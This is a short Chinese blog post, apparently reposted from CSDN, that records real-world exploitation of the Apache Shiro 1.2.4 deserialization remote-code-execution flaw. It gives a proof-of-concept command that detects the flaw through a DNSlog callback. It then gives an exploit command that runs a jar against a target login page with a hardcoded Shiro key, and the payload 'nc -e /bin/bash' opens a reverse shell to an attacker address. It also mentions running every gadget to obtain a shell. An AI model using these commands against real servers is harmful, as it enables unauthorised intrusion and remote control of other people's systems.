shiro RCE (反序列化漏洞)

shiro RCE 攻击

这篇讲1.2.4的反序列化漏洞在实战中的记录

第一种比较稳妥的验证漏洞方式:

1 POC

python shiro_check_key.py https://xxx.xxx.xxx.xxx "my0njp.dnslog.cn"

DNSlog收到请求(平台地址:http://www.dnslog.cn/

2 EXP

这里的回显是基于spring框架的,其实可以直接用过监听JMPServer直接执行命令

java -jar ShirobootRce.jar https://xxx.xxx.xxx.xxx/login Z3VucwAAAAAAAAAAAAAAAA== c3 "nc -e /bin/bash xxx.xxx.xxx.xxx 8081"

第二种比较稳妥的验证漏洞的方式:

也需要结合第三方平台DNSlog

默认会把所有的Gadget跑一遍,然后直接点执行就可以反弹shell

猜你喜欢

转载自blog.csdn.net/qq_38376348/article/details/106500088